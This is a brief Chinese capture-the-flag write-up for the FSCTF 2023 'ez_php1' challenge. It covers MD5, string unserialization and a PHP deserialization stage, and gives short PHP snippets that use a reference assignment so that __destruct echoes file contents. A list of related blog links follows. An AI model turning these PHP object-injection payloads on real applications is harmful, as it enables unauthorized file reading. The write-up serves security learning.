[FSCTF 2023]ez_php1

一共有三小关

第一关:md5加密

第二关:反序列化

重点 单个字符串序列化 unserialize($str) === "$KEY"

php 复制代码
<?php
$KEY="YES I love";

echo serialize($KEY);

s:10:"YES I love";

第三关: 反序列化

把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。

php 复制代码
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);
相关推荐
郑州光合科技余经理8 分钟前
海外版外卖系统源码:支付/地图/多语言核心代码实现
android·java·前端·后端·架构·uni-app·php
不灭锦鲤8 分钟前
网络安全第117天
安全·web安全
霸道流氓气质21 分钟前
Spring Cloud Nacos 服务注册 IP 选择机制与配置详解
tcp/ip·spring cloud·php
郝学胜-神的一滴1 小时前
系统设计 014:缓存深度实战:如何用 Cache 优雅优化数据库读写?
java·数据库·python·缓存·oracle·php·软件构建
行者-全栈开发1 小时前
CVE-2026-20131:Cisco防火墙管理中枢未授权RCE漏洞深度剖析与紧急修复指南
web安全·rce·防火墙安全·cve-2026-20131·cisco fmc·远程代码执行·cvss 10.0
憧憬成为web高手1 小时前
[0CTF 2016]piapiapia 脚本和总结
web安全·网络安全
chushiyunen1 小时前
linux环境部署php、php-npm
linux·npm·php
withoutfear1 小时前
PHP验证是不是真实手机号
php·手机号真实性·验证手机号
cq林志炫1 小时前
fastadmin 如何限制访问public\assets\libs目录下面的所有html文件
html·php·fastadmin
Whoami!1 小时前
03-【高校】多校区链路加解密架构
网络安全·架构·链路加解密